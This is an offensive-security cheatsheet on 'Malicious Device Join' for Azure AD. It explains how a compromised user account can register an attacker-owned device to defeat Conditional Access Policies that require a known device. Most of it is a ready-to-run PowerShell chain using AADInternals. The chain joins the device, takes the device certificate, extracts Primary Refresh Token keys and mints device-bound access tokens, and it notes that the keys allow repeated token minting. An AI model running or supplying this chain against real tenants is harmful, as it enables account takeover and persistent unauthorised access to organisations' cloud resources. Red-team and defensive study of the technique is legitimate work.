Malicious Device Join
A cheatsheet for Malicious Device Join: bypassing Conditional Access Policies that require a known device by registering an attacker-controlled device in the tenant with a compromised user account and using the resulting device certificate to obtain tokens for that user.
Author: otter
This technique allows bypassing Conditional Access Policies that gate access on device state (for example "require Azure AD joined or registered device").
Devices are identified by a certificate issued during the registration process, so all we need is a compromised user account that is allowed to register devices. With such an account we register a new device, receive its certificate, and can then request a Primary Refresh Token (PRT) for the user that is bound to that device. There are 3 different Device Join types, which depend on the characteristics of the joined device:
- Registered: personal (BYOD) devices, registered in Azure AD but not owned by the organization
- Joined: devices owned by the organization and joined directly to Azure AD
- Hybrid Joined: devices owned by the organization that are joined to on-premises Active Directory and additionally registered in Azure AD; sign-in is controlled by on-premises AD
To join a device with our compromised account we use the following AADInternals command, which performs the registration and generates the device certificate (the `.pfx` file, named after the new device ID, is written to the current directory). The account first needs a device registration access token, obtained with `Get-AADIntAccessTokenForAADJoin -SaveToCache`, and the user must be permitted to join devices (the tenant's "Users may join devices to Azure AD" setting and the per-user device limit apply).

```powershell
PS /home/otter> Join-AADIntDeviceToAzureAD -DeviceName "Otter's Computer" -DeviceType "Windows" -OSVersion "10.0.19044.2364"
```
Now we can use the device certificate together with the user's credentials to request a PRT for the compromised user and exchange it for access tokens, which carry the device identity and therefore satisfy Conditional Access Policies that only require a joined or registered device. Note the limits of the bypass: a device joined this way is neither Intune-managed nor hybrid joined, so policies that require a compliant device or a Hybrid Azure AD joined device are not satisfied by the join alone.
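The complete chain from join to a device-bound access token, as an added example that is not part of the original cheatsheet or of AADInternals' own documentation. It assumes the compromised account `otter@contoso.onmicrosoft.com` with a known password, that this user is permitted to join devices, and that `Join-AADIntDeviceToAzureAD` writes the new `<DeviceId>.pfx` into the current directory as AADInternals documents; the cmdlet names and parameters follow the AADInternals documentation but should be checked against the installed module version. The final `deviceid` claim check is an added sanity check, not an AADInternals feature.

```powershell
# Added example (not from the original cheatsheet): join -> PRT -> access token with AADInternals.
# Assumptions: compromised user $upn with known password, user may join devices, and the join
# writes <DeviceId>.pfx to the current directory. Run from a directory you control.
Import-Module AADInternals

$upn      = "otter@contoso.onmicrosoft.com"                       # assumed compromised account
$password = ConvertTo-SecureString "Passw0rd!" -AsPlainText -Force # assumed known password
$creds    = [pscredential]::new($upn, $password)

# 1. Get an access token for the device registration service and cache it for the join.
Get-AADIntAccessTokenForAADJoin -Credentials $creds -SaveToCache

# 2. Join the device. Record existing .pfx files first so the new certificate can be located
#    afterwards without relying on the cmdlet's console output.
$before = @(Get-ChildItem -Filter *.pfx | Select-Object -ExpandProperty Name)
Join-AADIntDeviceToAzureAD -DeviceName "Otter's Computer" -DeviceType "Windows" -OSVersion "10.0.19044.2364"
$pfx = Get-ChildItem -Filter *.pfx | Where-Object { $_.Name -notin $before } | Select-Object -First 1
if (-not $pfx) { throw "No new device certificate found in $PWD; did the join succeed?" }

# 3. Use the device certificate plus the user's credentials to obtain PRT keys for the user.
#    The PRT is bound to the device identity in the certificate.
$prtKeys = Get-AADIntUserPRTKeys -PfxFileName $pfx.FullName -Credentials $creds

# 4. Build a PRT token with a fresh nonce and exchange it for an access token.
$prtToken    = New-AADIntUserPRTToken -Settings $prtKeys -GetNonce
$accessToken = Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

# 5. Sanity check (added here, assumption: v1.0 tokens expose the device as the "deviceid" claim):
#    decode the JWT payload without verifying it and confirm the device identity is present.
function Get-JwtClaims {
    param([Parameter(Mandatory)][string]$Jwt)
    $payload = $Jwt.Split('.')[1].Replace('-', '+').Replace('_', '/')
    switch ($payload.Length % 4) { 2 { $payload += '==' } 3 { $payload += '=' } }
    [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
}

$claims = Get-JwtClaims -Jwt $accessToken
if (-not $claims.deviceid) {
    throw "Token carries no deviceid claim; a device-based Conditional Access Policy would not be satisfied."
}
"Access token for $($claims.upn) issued for device $($claims.deviceid) (expires $([DateTimeOffset]::FromUnixTimeSeconds($claims.exp)))"
```

The PRT keys returned in step 3 can be reused to mint further PRT tokens, so the credentials are only needed once; if step 1 itself is blocked by a Conditional Access Policy (for example one requiring MFA for all cloud apps), the join never happens and this technique does not apply.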